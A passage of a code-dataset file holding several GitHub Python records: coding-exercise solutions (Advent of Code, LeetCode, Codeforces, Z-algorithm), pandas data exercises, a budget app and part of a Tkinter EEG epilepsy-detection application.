loginButton = c.waitForElement(self.driver,By.ID, 'cn.cj.pe:id/login')\r\n \r\n print('开始计时和点击登录')\r\n start = time.time()\r\n loginButton.click()\r\n \r\n print('wait for Element')\r\n c.waitForElement(self.driver,By.ID, 'cn.cj.pe:id/submit')\r\n end = time.time()\r\n \r\n # c.waitForElement(self.driver,By.ID, 'cn.cj.pe:id/check')\r\n # print('点击')\r\n # els2 = self.driver.find_elements_by_id('cn.cj.pe:id/check')\r\n # print('点击')\r\n # els2[0].click()\r\n # print('点击')\r\n # els2[1].click()\r\n print('点击')\r\n c.waitForElement(self.driver, By.ID, 'cn.cj.pe:id/submit').click()\r\n \r\n valueTime = str(round((end - start), 2))\r\n print('时间差: %r' %valueTime)\r\n return valueTime\r\n except BaseException:\r\n print('首次登录出错!!!')\r\n return 0\r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"hi-cbh/pytest","sub_path":"src/testcase/v722/case/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15836747352","text":"# 내 풀이\nN, K = map(int, input().split())\n\nresult = 0\nwhile N != 1:\n if N % K != 0:\n N -= 1\n else:\n N //= K\n\n result += 1\n\nprint(result)\n\n# 책 풀이\nn, k = map(int, input().split())\nresult = 0\n\nwhile True:\n target = (n // k) * k\n result += (n - target)\n n = target\n\n if n < k:\n break\n\n result += 1\n n //= k\n\nresult += (n - 1)\nprint(result)","repo_name":"mark1346/coding_test_study","sub_path":"keongmin/ch3/2-3-4.py","file_name":"2-3-4.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"512543659","text":"import re\nimport collections\n\ntape = collections.defaultdict(int)\ncursor = 0\n\n\n\"\"\"Begin in state A.\nPerform a diagnostic checksum after 6 steps.\n\nIn state A:\n If the current value is 0:\n - Write the value 1.\n - Move one slot to the right.\n - Continue with state B.\n If the current value is 1:\n - Write the value 0.\n - Move one slot to the left.\n - Continue with state B.\n\nIn state B:\n If the current value is 0:\n - Write the value 1.\n - Move one slot to the left.\n - Continue with state A.\n If the current value is 1:\n - Write the value 1.\n - Move one slot to the right.\n - Continue with state A.\"\"\"\n\nBEGIN_INSTR = re.compile(r'Begin in state (?P[A-Z])\\.')\nCHEKSUM_INSTR = re.compile(r'Perform a diagnostic checksum after (?P[0-9]+) steps\\.')\nSTATE_BEGIN = re.compile(r'In state (?P[A-Z]):')\nSTATE_IF = re.compile(r'If the current value is (?P[0-1]):')\nWRITE_RULE = re.compile(r'- Write the value (?P[0-1])\\.')\nMOVE_RULE = re.compile(r'- Move one slot to the (?P(left|right))\\.')\nCONTINUE_RULE = re.compile(r'- Continue with state (?P[A-Z])\\.')\n\nwith open('day25.in', 'r') as f:\n\tinp = [x.strip() for x in f.readlines()]\n\t\n\t# Read begin state\n\tbeginstate = BEGIN_INSTR.match(inp[0]).group('beginstate')\n\t# Checksum after\n\tchecksum = int(CHEKSUM_INSTR.match(inp[1]).group('checksum'))\n\n\tstates = {}\n\tinstrs = {}\n\n\ti = 2\n\twhile i < len(inp):\n\t\tinstrs = {}\n\t\t# Disregard empty line\n\t\t#print(\"SKIP\", inp[i])\n\t\ti += 1\n\t\t# Read state name\n\t\t#print(\"STATE\", inp[i])\n\t\tstate = STATE_BEGIN.match(inp[i]).group('statename')\n\t\ti += 1\n\t\t# Read next value\n\t\t#print(\"IF\", inp[i])\n\t\tvalue = int(STATE_IF.match(inp[i]).group('curval'))\n\t\ti += 1\n\t\t# Read write instr\n\t\t#print(\"WRITE\", inp[i])\n\t\twrite = int(WRITE_RULE.match(inp[i]).group('val'))\n\t\ti += 1\n\t\t# Read move instr\n\t\t#print(\"MOVE\", inp[i])\n\t\tmove = MOVE_RULE.match(inp[i]).group('dir')\n\t\ti += 1\n\t\t# Read continue instr\n\t\t#print(\"CONTINUE\", inp[i])\n\t\tnxt = CONTINUE_RULE.match(inp[i]).group('nextstate')\n\t\ti += 1\n\t\tinstrs[value] = {'write': write, 'move': move, 'next': nxt}\n\t\t# Read next value\n\t\tvalue = int(STATE_IF.match(inp[i]).group('curval'))\n\t\ti += 1\n\t\t# Read write instr\n\t\twrite = int(WRITE_RULE.match(inp[i]).group('val'))\n\t\ti += 1\n\t\t# Read move instr\n\t\tmove = MOVE_RULE.match(inp[i]).group('dir')\n\t\ti += 1\n\t\t# Read continue instr\n\t\tnxt = CONTINUE_RULE.match(inp[i]).group('nextstate')\n\t\ti += 1\n\t\tinstrs[value] = {'write': write, 'move': move, 'next': nxt}\n\t\tstates[state] = instrs\n\n#print(states)\n\n# Start in the begin state\ncurrent_state = beginstate\n\n#print(dict(tape), cursor, current_state)\n# Run for the required amount of steps\nfor i in range(checksum):\n\toldval = tape[cursor]\n\t# Write value belonging to current state and value\n\ttape[cursor] = states[current_state][oldval]['write']\n\t# Move in direction belonging to current state and value\n\tnewdir = states[current_state][oldval]['move']\n\tif newdir == \"left\":\n\t\tcursor -= 1\n\telse:\n\t\tcursor += 1\n\t# Continue in next state belonging to current state and value\n\tcurrent_state = states[current_state][oldval]['next']\n\n\t#print(dict(tape), cursor, current_state)\n\nprint(\"Number of 1s:\", sum([x for x in tape.values() if x == 1]))\n","repo_name":"Kurocon/AdventOfCode2017","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23776355081","text":"'''\n1970. Last Day Where You Can Still Cross\nHard\n\n1054\n\n19\n\nAdd to List\n\nShare\nThere is a 1-based binary matrix where 0 represents land and 1 represents water. You are given integers row and col representing the number of rows and columns in the matrix, respectively.\n\nInitially on day 0, the entire matrix is land. However, each day a new cell becomes flooded with water. You are given a 1-based 2D array cells, where cells[i] = [ri, ci] represents that on the ith day, the cell on the rith row and cith column (1-based coordinates) will be covered with water (i.e., changed to 1).\n\nYou want to find the last day that it is possible to walk from the top to the bottom by only walking on land cells. You can start from any cell in the top row and end at any cell in the bottom row. You can only travel in the four cardinal directions (left, right, up, and down).\n\nReturn the last day where it is possible to walk from the top to the bottom by only walking on land cells.\n\n \n\nExample 1:\n\n\nInput: row = 2, col = 2, cells = [[1,1],[2,1],[1,2],[2,2]]\nOutput: 2\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 2.\nExample 2:\n\n\nInput: row = 2, col = 2, cells = [[1,1],[1,2],[2,1],[2,2]]\nOutput: 1\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 1.\nExample 3:\n\n\nInput: row = 3, col = 3, cells = [[1,2],[2,1],[3,3],[2,2],[1,1],[1,3],[2,3],[3,2],[3,1]]\nOutput: 3\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 3.\n \n\nConstraints:\n\n2 <= row, col <= 2 * 104\n4 <= row * col <= 2 * 104\ncells.length == row * col\n1 <= ri <= row\n1 <= ci <= col\nAll the values of cells are unique.\n'''\nclass Solution:\n def latestDayToCross(self, row: int, col: int, cells: List[List[int]]) -> int:\n def dfs(i, j, mat):\n # print(i, j, mat)\n if i == row-1:\n return True\n mat[i][j] = 1\n for ni, nj in [(i-1, j), (i, j-1), (i, j+1), (i+1, j)]:\n if 0<=ni int:\n class UF:\n def __init__(self, n):\n self.root = [i for i in range(n)]\n self.rank = [0 for _ in range(n)]\n \n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n \n def union(self, x, y):\n rx, ry = self.find(x), self.find(y)\n if rx != ry:\n if self.rank[rx] < self.rank[ry]:\n self.root[rx] = ry\n else:\n self.root[ry] = rx\n if self.rank[rx] == self.rank[ry]:\n self.rank[rx] += 1\n \n uf = UF(row*col+2)\n grid = [[1]*col for _ in range(row)]\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n \n for i in range(row*col-1, -1, -1):\n r, c = cells[i][0]-1, cells[i][1]-1\n grid[r][c] = 0\n ind1 = r*col + c + 1\n for dr, dc in directions:\n nr, nc = r+dr, c+dc\n \n if 0<=nr list:\n \"\"\"\n z-algorithm for pattern matching\n\n :param string: a string \n\n :returns: the z array \n \"\"\"\n assert len(string) != 0\n\n # initialize z array\n z_arr = [0 for _ in range(len(string))]\n\n # length of string stored in first cell\n z_arr[0] = n = len(string)\n\n l, r, k = 0, 0, 0\n for i in range(1, n):\n\n # CASE 1: i>R (i outside box or no box)\n # calculate Z[i] naively\n if i > r:\n l, r = i, i\n\n # compare\n while r < n and string[r - l] == string[r]:\n r += 1\n z_arr[i] = r - l\n r -= 1\n\n # CASE 2: i<=R (i inside box)\n else:\n # k = i-L so k corresponds to number which\n # matches in [L,R] interval.\n k = i - l\n\n # CASE 2a: Z[k] < remaining\n # Z[i] equal to Z[k]\n if z_arr[k] < r - i + 1:\n z_arr[i] = z_arr[k]\n\n # CASE 2b: z[k] > remaining\n # z[i] = remaining\n elif z_arr[k] > r - i + 1:\n z_arr[i] = r - i + 1\n\n # CASE 2c: Z[k] = remaining\n # compare string[r + 1 ... r + n]\n elif z_arr[k] == r - i + 1:\n l = i\n while r < n and string[r - l] == string[r]:\n r += 1\n z_arr[i] = r - l\n r -= 1\n return z_arr\n\n\ndef period_old(string):\n \"\"\"\n z_algo = O(n)\n BM = O(n + m)\n \"\"\"\n z_arr = z_algo(string) # O(n)\n len_string = z_arr[0]\n \n p = 0\n expected_k = len_string\n while expected_k:\n p = len_string//expected_k\n \n actual_k = 0\n for i in z_arr:\n if i >= p:\n actual_k += 1\n \n if actual_k == expected_k:\n break\n \n expected_k -= 1\n while expected_k and len_string//expected_k == p:\n p = len_string//expected_k\n expected_k -= 1\n \n result = p\n if expected_k == 1:\n result = \"string not periodic\"\n \n return result\n\ndef period(string):\n \"\"\"\n z_algo = O(n)\n BM = O(n + m)\n \"\"\"\n z_arr = z_algo(string) # O(n)\n len_string = z_arr[0]\n \n i = len_string - 1\n while z_arr[i] == 0 and i >= 0:\n i -= 1\n p = z_arr[i]\n \n if p + z_arr[p] == len_string:\n return p \n \n return \"string not periodic\"\n \n\nif __name__ == \"__main__\":\n print(period(\"abcdabcdabcdabcdabcdabcd\"))\n print(z_algo(\"bbccaebbcabd\"))","repo_name":"OohpiEr/FIT3155-S1-2022","sub_path":"Assignment 1/ref/z_algo.py","file_name":"z_algo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17102922382","text":"# with open(\"weather_data.csv\") as data:\n# print(data.readlines())\nimport csv\nimport pandas\nimport pandas as pd\n# -------------------------------------------------\n# with open(\"weather_data.csv\") as text:\n# data = csv.reader(text)\n# temp = []\n# for row in data:\n# # print(row)\n# if row[1].isdigit():\n# temp1 = row[1]\n# temp.append(int(temp1))\n# print(temp)\n#--------------------------------------------------------\n\n# data = pandas.read_csv(\"weather_data.csv\")\n'''For fetching values from column'''\n# temp_list = data[\"temp\"].to_list()\n# sum_list = data[\"temp\"].sum()\n# avg_sum = round(sum_list/len(temp_list),4)\n# print(avg_sum)\n# max_value = data[\"temp\"].max()\n# print(max_value)\n# print(data.condition)\n'''For fetching values from row'''\n# max_value = data.temp.max()\n# print(data[data.temp == max_value])\n# mon = data[data.day == \"Monday\"]\n# print(f\"{(mon.temp*1.8)+32}\")\n'''Creating dataframe from scratch'''\n# data_dict = {\n# \"students\":[\"Any\",\"James\",\"Angela\",\"Hitesh\"],\n# \"scores\":[76,89,92,99]\n# }\n# data = pandas.DataFrame(data_dict)\n# data.to_csv(\"data_dict.csv\")\n\n# -------------------------------------------------------------------\n\nsquirrel_data = pd.read_csv(\"squirrel_data.csv\")\ngray_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Gray\"])\ncinnamon_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Cinnamon\"])\nblack_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Black\"])\ncolor_data = {\n \"Fur_color\":[\"Gray\", \"Red\", \"Black\"],\n \"Count\":[gray_count, cinnamon_count, black_count]\n}\ndata = pd.DataFrame(color_data)\ndata.to_csv(\"Fur Color.csv\")\n\n# print(data)\n\n# new_data = pd.read_csv(\"Fur Color.csv\")\n# print(new_data)\n","repo_name":"Hit07/Minor-Project-Python","sub_path":"Data Analytics/Squirrel Data Analytics 2018/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21295758216","text":"#%% Class\nclass Category:\n \n def __init__(self, category):\n self.category = category\n self.ledger = []\n self.total = 0\n \n def deposit(self, amount, description=\"\"): \n \n new_record = {\"amount\": float(amount), \"description\": description} \n self.ledger.append(new_record)\n self.total = self.total + amount\n\n \n def withdraw(self, amount, description=\"\"):\n self.amount = amount\n self.description = description\n \n if self.total > self.amount:\n new_record= {\"amount\": -abs(amount), \"description\":description} \n self.ledger.append(new_record)\n self.total = self.total - self.amount\n return True\n else:\n return False\n \n \n def get_balance(self):\n return self.total\n \n def transfer(self, amount, another_category):\n if self.total > amount: \n self.ledger.append({'amount': -abs(amount), 'description': f\"Transfer to {another_category.category}\"})\n self.total = self.total - amount\n \n another_category.ledger.append({'amount': float(amount), 'description': f\"Transfer from {self.category}\"})\n another_category.total = another_category.total + amount\n \n return True\n \n else:\n return False\n\n def check_funds(self, amount):\n if self.total >= amount: \n return True\n else:\n return False\n \n def __str__(self): \n length_of_category_name = len(self.category)\n start_index_of_category_name = (30 - length_of_category_name)/2 - 1\n number_of_stars = int((30 - length_of_category_name)/2) * \"*\"\n \n all_output = ''\n \n for x in self.ledger:\n for k, v in x.items():\n if k == 'amount':\n amount = \"{:.2f}\".format(v)\n if k == 'description':\n if v != '':\n description = v[:23]\n else:\n description = ' '\n \n space = (30 - (len(description) + len(str(amount)))) * ' '\n \n ledger_output = f'{description}{space}{amount}'\n all_output = f'{all_output}\\n{ledger_output}'\n \n \n return f'{number_of_stars}{self.category}{number_of_stars}{all_output}\\nTotal: {self.total}'\n \n\n#%% Function\ndef create_spend_chart(categories):\n \n list_of_expenses_for_category = []\n list_of_percentage_for_category = []\n list_of_rounded_percentages = []\n sum_of_all_expenses = 0 \n category_names = []\n \n for x in categories:\n category_name = x.category\n expenses = 0\n category_names.append(category_name)\n \n for y in x.ledger:\n for k,v in y.items():\n if (isinstance(v, float) or isinstance(v, int)) and v < 0:\n expenses = expenses + abs(v)\n \n list_of_expenses_for_category.append({category_name:expenses})\n \n for x in list_of_expenses_for_category:\n for k, v in x.items():\n sum_of_all_expenses = sum_of_all_expenses + v\n \n for x in list_of_expenses_for_category:\n for k, v in x.items(): \n percentage_for_category = int((v/sum_of_all_expenses)*100)\n list_of_percentage_for_category.append({k:percentage_for_category})\n \n for x in list_of_percentage_for_category: \n for k,v in x.items():\n new_value = (v//10)*10\n list_of_rounded_percentages.append(new_value)\n \n #Chart\n title = f'Percentage spent by category\\n' \n chart = \"\"\n for value in reversed(range(0, 101, 10)):\n chart += str(value).rjust(3) + '|'\n for x in list_of_rounded_percentages:\n if x >= value:\n chart += \" o \"\n else:\n chart += \" \"\n \n chart += \" \\n\" \n \n footer = \" \" + \"-\" * ((3 * len(categories)) + 1) + \"\\n\"\n max_length = max(map(lambda x: len(x), category_names))\n category_names_with_spaces = list(map(lambda name: name.ljust(max_length), category_names))\n\n for x in zip(*category_names_with_spaces):\n footer += \" \" + \"\".join(map(lambda s: s.center(3), x)) + \" \\n\"\n\n return (title + chart + footer).rstrip(\"\\n\")\n\n \n ","repo_name":"barbara-wachek/courses_and_exercises","sub_path":"freecodecamp_03_budget_app/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22315534345","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nis_succ = [False] * n\nscores = [\"\"] * n\n\nfor i in range(n):\n scores[i] = input()\n\nfor i in range(m):\n max_score = 0\n for j in range(n):\n if max_score < int(scores[j][i]):\n max_score = int(scores[j][i])\n for j in range(n):\n if max_score == int(scores[j][i]):\n is_succ[j] = True\n\nans = 0\nfor i in range(n):\n if is_succ[i]:\n ans += 1\n\nprint(ans)\n","repo_name":"guzhoudiaoke/practice","sub_path":"codeforces/152A/py/152a.py","file_name":"152a.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27743072116","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import tix\nfrom tkinter import messagebox\nfrom tkinter.messagebox import showinfo\nfrom tkinter.filedialog import askopenfile\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter, A4\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import SimpleDocTemplate, Image\nimport webbrowser\nfrom tkinter.filedialog import askopenfile, askopenfilename\nfrom PIL import Image, ImageTk\nimport sqlite3\nimport numpy as np\nimport tensorflow as tf\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport os\nimport time\nimport mne\nimport pyedflib\nfrom Classes2 import Evento\nfrom Classes2 import SinalEEG\nfrom Functions import load, processing, network, plots\n#from Modulos import LeituraArquivos,ConfusionMatrix, ProcessamentoDoSinal, LeituraEventos, AssociaTrechoEvento, CriaImagen, CNN\n\nfrom Modulos2 import (\n CNN,\n AssociaTrechoEvento,\n ConfusionMatrix,\n CriaImagen,\n LeituraArquivos,\n LeituraEventos,\n ProcessamentoDoSinal,\n CriaRede,\n UsaRede,\n graficos,\n)\n\nImagem1 = \"ufmg _logo.png\"\n\nroot = tix.Tk()\naccuracyValue = \"A\"\nrecall = \"A\"\nprecision = \"A\"\narquivoName = \"\"\n\n# global variable\nblank_2 = []\nblank_1 = []\n\n\nclass Relatorios():\n def printCliente(self):\n webbrowser.open(\"cliente.pdf\")\n\n def gerarRelatorioCliente(self):\n self.c = canvas.Canvas(\"cliente.pdf\")\n self.codigoRel = self.codigo_entry.get()\n self.ageRel = self.age_entry\n self.infoRel = self.info_entry.get()\n self.generoRel = self.gender_entry\n self.accuracy = accuracyValue\n self.recall = recall\n self.precision = precision\n self.nomeArquivo = arquivoName\n\n self.c.setFont(\"Helvetica-Bold\", 24)\n self.c.drawString(200, 790, 'Ficha do Paciente')\n\n self.c.setFont(\"Helvetica-Bold\", 18)\n self.c.drawString(50, 700, 'Cod: ')\n self.c.drawString(50, 670, 'Age: ')\n self.c.drawString(50, 630, 'Gender: ')\n self.c.drawString(50, 600, 'Informations about: ')\n self.c.drawString(50, 570, 'File name: ')\n self.c.drawString(50, 530, 'Algorithm results: ')\n\n self.c.setFont(\"Helvetica\", 18)\n self.c.drawString(150, 700, self.codigoRel)\n self.c.drawString(150, 670, self.age_entry)\n\n self.c.drawString(150, 630, self.generoRel)\n self.c.drawString(200, 600, self.infoRel)\n self.c.drawString(200, 570, self.nomeArquivo)\n self.c.drawString(300, 530, self.accuracy)\n self.c.rect(20, 300, 550, 5, fill=True, stroke=False)\n\n self.c.showPage()\n self.c.save()\n self.printCliente()\n\n\nclass Funcs():\n def limpa_cliente(self):\n self.codigo_entry.delete(0, END)\n self.age_entry.delete(0, END)\n self.info_entry.delete(0, END)\n self.Tipvar.set('Male')\n self.nomeArquivo = ''\n self.accuracy_entry = ''\n self.recall_entry = ''\n self.precision_entry = ''\n\n def conecta_bd(self):\n self.conn = sqlite3.connect(\"clientes.bd\")\n self.cursor = self.conn.cursor()\n\n def desconecta_bd(self):\n self.conn.close()\n\n def montaTabelas(self):\n self.conecta_bd()\n ### Criar Tabela\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS clientes(\n cod INTEGER PRIMARY KEY,\n nomeArquivo CHAR(200) NOT NULL,\n info CHAR(200),\n age INT(50),\n genero CHAR(40),\n accuracy INT(40),\n recall INT(40),\n precision INT(40)\n );\n \n \"\"\")\n # ADD acurracy CHAR(40)\n self.conn.commit()\n self.desconecta_bd()\n\n def variaveis_inicio(self):\n self.codigo = self.codigo_entry.get()\n self.age = self.age_entry.get()\n self.genero = self.Tipvar.get()\n self.info = self.info_entry.get()\n self.nomeArquivo = self.nomeArquivo\n self.accuracy = self.accuracy_entry\n self.recall = self.recall_entry\n self.precision = self.precision_entry\n self.ditArquivoEDF = self.ditArquivoEDF\n self.nomeArquivoEDF = self.nomeArquivoEDF\n self.nome_arquivo_salvo = self.nome_arquivo_salvo\n\n def variaveis_acao(self):\n self.codigo = self.codigo_entry.get()\n self.age = self.age_entry.get()\n self.genero = self.Tipvar.get()\n self.info = self.info_entry.get()\n self.nomeArquivo = self.nomeArquivo\n self.accuracy = self.accuracy_entry\n self.recall = self.recall_entry\n self.precision = self.precision_entry\n\n def add_cliente(self):\n self.variaveis_inicio()\n if self.nome_arquivo_salvo == \"\":\n msg = \"To register a new patient,\\n\"\n msg += \"it is necessary to select the files\"\n messagebox.showinfo(\"Customer registration - Warning !!!\", msg)\n else:\n self.conecta_bd()\n self.cursor.execute(\n \"\"\" INSERT INTO clientes (age,genero, info, accuracy, recall, precision, nomeArquivo)\n VALUES(?, ?, ?, ?, ?, ?,?) \"\"\",\n (self.age, self.genero, self.info, self.accuracy, self.recall,\n self.precision, self.nome_arquivo_salvo))\n self.conn.commit()\n self.desconecta_bd()\n self.select_lista()\n self.limpa_cliente()\n\n def select_lista(self):\n self.listaCli.delete(*self.listaCli.get_children())\n self.conecta_bd()\n lista = self.cursor.execute(\n \"\"\" SELECT cod, age, genero , info, accuracy,recall,precision, nomeArquivo FROM clientes \n ORDER BY cod; \"\"\")\n\n for i in lista:\n self.listaCli.insert(\"\", END, values=i)\n self.desconecta_bd()\n\n def OnDoubleClick(self, event):\n self.limpa_cliente()\n self.listaCli.selection()\n\n for n in self.listaCli.selection():\n print(self.listaCli.item(n, 'values'))\n col1, col2, col3, col4, col5, col6, col7, col8 = self.listaCli.item(\n n, 'values')\n self.codigo_entry.insert(END, col1)\n self.info_entry.insert(END, col4)\n self.nomeArquivo = col8\n self.accuracy_entry = col5\n self.recall_entry = col6\n self.precision_entry = col7\n self.age_entry.insert(END, col2)\n self.Tipvar.set(col3)\n global accuracyValue\n accuracyValue = col5\n global recall\n recall = col6\n global precision\n precision = col7\n global arquivoName\n arquivoName = col8\n\n def deleta_cliente(self):\n self.variaveis_acao()\n self.conecta_bd()\n self.cursor.execute(\"\"\" DELETE FROM clientes WHERE cod = ? \"\"\",\n (self.codigo))\n self.conn.commit()\n self.desconecta_bd()\n self.limpa_cliente()\n self.select_lista()\n\n def alterar_cliente(self):\n self.variaveis_acao()\n self.conecta_bd()\n self.cursor.execute(\n \"\"\" UPDATE clientes SET age = ?, info = ?, genero = ?, accuracy = ?, recall=?, precision=?, nomeArquivo = ?\n WHERE cod = ? \"\"\",\n (self.age, self.info, self.genero, accuracyValue, precision,\n precision, arquivoName, self.codigo))\n self.conn.commit()\n self.desconecta_bd()\n self.select_lista()\n self.limpa_cliente()\n\n def busca_cliente(self):\n self.conecta_bd()\n self.listaCli.delete(*self.listaCli.get_children())\n\n codigo = self.codigo_entry.get()\n self.cursor.execute(\n \"\"\" SELECT cod, age, info, genero, accuracy, recall, precision, nomeArquivo FROM clientes\n WHERE cod LIKE '%s' ORDER BY cod ASC\"\"\" % codigo)\n buscaCli = self.cursor.fetchall()\n for i in buscaCli:\n self.listaCli.insert(\"\", END, values=i)\n self.limpa_cliente()\n self.desconecta_bd()\n\n\nclass Application(Funcs, Relatorios):\n def __init__(self):\n self.root = root\n self.root2 = root\n self.sinal_eeg = []\n self.eventos = []\n self.nomeArquivo = ''\n self.accuracy_entry = ''\n self.ditArquivoEDF = ''\n self.nomeArquivoEDF = ''\n self.nome_arquivo_salvo = ''\n self.recall_entry = ''\n self.precision_entry = ''\n self.new_model_name = ''\n self.tela()\n self.frames_de_tela()\n self.widgets_frame()\n self.montaTabelas()\n\n root.mainloop()\n\n def buscar_arquivo(self):\n aux, self.nomeArquivo = LeituraArquivos.ImportarSinalEEG()\n print(\"-------------------------------\")\n print(self.nomeArquivo)\n print(\"-------------------------------\")\n self.sinal_eeg.append(aux)\n aux2 = LeituraEventos.importar_evento()\n self.eventos.append(aux2)\n\n def buscar_arquivo2(self):\n self.ditArquivoEDF, self.ditArquivoTSE = LeituraArquivos.ImportarDiretorios(\n )\n print(\"ARQUIVO EDF DIRETORIO\" + self.ditArquivoEDF)\n print(\"ARQUIVO TSE DIRETORIO\" + self.ditArquivoTSE)\n\n def buscar_arquivos3(self):\n self.nomeArquivoEDF, self.nomeArquivoTSE = LeituraArquivos.ImportarCaminhoArquivos(\n )\n print(\"Nome arquivo\" + self.nomeArquivoEDF)\n print(\"Nome arquivo\" + self.nomeArquivoTSE)\n\n def buscar_arquivos(self):\n #IMPORTAR DIRETORIOS DO ARQUIVO\n print(\" LI ARQUIVOS E PEGUEI O CAMINHO ---------------------\")\n self.nomeArquivoEDF, self.nomeArquivoTSE = LeituraArquivos.ImportarCaminhoArquivos(\n )\n\n print(\"CAMINHO ARQUIVO EDF\" + self.nomeArquivoEDF)\n print(\"CAMINHO ARQUIVO TSE\" + self.nomeArquivoTSE)\n #IMPORTAR NOME DOS ARQUIVOS\n print(\"AGORA VOU PEGAR OS NOMES ORIGINAIS ---------------------\")\n path = self.nomeArquivoEDF\n nome_arquivo = self.nomeArquivoEDF\n nome_original = os.path.basename(os.path.normpath(path))\n self.ditArquivoEDF = nome_arquivo.replace(nome_original, '')\n\n path2 = self.nomeArquivoTSE\n nome_arquivo2 = self.nomeArquivoTSE\n nome_original2 = os.path.basename(os.path.normpath(path))\n self.ditArquivoTSE = nome_arquivo.replace(nome_original2, '')\n\n print(\"DIRETÓRIO ARQUIVO EDF\" + self.ditArquivoEDF)\n print(\"DIRETÓRIO ARQUIVO TSE\" + self.ditArquivoTSE)\n\n #IMPORTAR APENAS O CAMINHO SEM O NOME DO ARQUIVO\n print(\"AGORA VOU PEGAR SÓ O CAMINHO E O EVENTO ---------------------\")\n self.nomeArquivo = self.nomeArquivoEDF\n path = self.nomeArquivoEDF\n nome_original = os.path.basename(os.path.normpath(path))\n print('Nome original: ' + nome_original)\n sinal_arquivo_edf = pyedflib.EdfReader(self.nomeArquivoEDF)\n sinal_eeg = SinalEEG.SinalEEG(sinal_arquivo_edf)\n nome_arquivo_tse = self.nomeArquivoEDF.replace(\".edf\", \".tse\")\n self.nome_arquivo_salvo = nome_original.replace(\".edf\", \"\")\n self.sinal_eeg.append(sinal_eeg)\n conteudo = np.genfromtxt(self.nomeArquivoTSE,\n dtype=\"str\",\n skip_header=2)\n quantidade_eventos = len(conteudo[:])\n eventos = []\n\n for i in range(0, quantidade_eventos - 1):\n evento = Evento.Evento(\n float(conteudo[i][0]),\n float(conteudo[i][1]),\n conteudo[i][2],\n float(conteudo[i][3]),\n )\n eventos.append(evento)\n\n sinal_eeg2 = eventos\n self.eventos.append(sinal_eeg2)\n\n print(\"FIM ---------------------------\")\n\n def comecar(self):\n self.JanelaClassificacao()\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n self.add_cliente()\n\n def comecar2(self):\n print(\"---------------------\")\n self.JanelaPrediction()\n print(\"---------------------\")\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n self.add_cliente()\n\n def tela(self):\n self.root.title(\"Epilepsy Detection\")\n self.root.config(bg=\"#DFEBE9\")\n self.root.geometry(\"1024x768\")\n self.root.resizable(True, True)\n self.root.maxsize(width=900, height=700)\n self.root.minsize(width=500, height=400)\n self.logo_cerebro = PhotoImage(file=\"logos/cerebrito.png\")\n label = Label(image=self.logo_cerebro, bg=\"#DFEBE9\")\n label.image = self.logo_cerebro # keep a reference!\n label.pack(side=LEFT, padx=64, pady=55)\n\n self.logo_ufmg = Image.open(\"logos/ufmg _logo.png\")\n self.resized_ufmg = self.logo_ufmg.resize((100, 42), Image.ANTIALIAS)\n self.logo_ufmg_resized = ImageTk.PhotoImage(self.resized_ufmg)\n label = Label(image=self.logo_ufmg_resized, bg=\"#DFEBE9\")\n label.image = self.logo_ufmg_resized # keep a reference!\n label.pack(side=LEFT, anchor=SE, padx=30, pady=30)\n\n self.logo_labbio = Image.open(\"logos/labbio_logo.png\")\n self.resized_labbio = self.logo_labbio.resize((100, 42),\n Image.ANTIALIAS)\n self.logo_labbio_resized = ImageTk.PhotoImage(self.resized_labbio)\n label = Label(image=self.logo_labbio_resized, bg=\"#DFEBE9\")\n label.image = self.logo_labbio_resized # keep a reference!\n label.pack(side=LEFT, anchor=SE, padx=1, pady=30)\n\n def frames_de_tela(self):\n self.frame_1 = Frame(self.root, bd=4, bg='#DFEBE9')\n self.frame_1.place(relx=0.70, rely=0.02, relwidth=0.27, relheight=0.80)\n\n def widgets_frame(self):\n ## Criando botao limpar\n self.Boton_info = Button(self.frame_1,\n text=\"Abaut\",\n font=(\"AvantGarde\", 20, \"bold\"),\n command=self.JanelaAbout,\n bg=\"#14787A\",\n fg=\"#ffffff\",\n width=\"15\",\n height=\"1\",\n cursor=\"hand2\")\n\n self.Boton_info.place(relx=0.02,\n rely=0.2,\n relwidth=0.98,\n relheight=0.10)\n\n ## Criando botao buscar\n self.Boton_add = 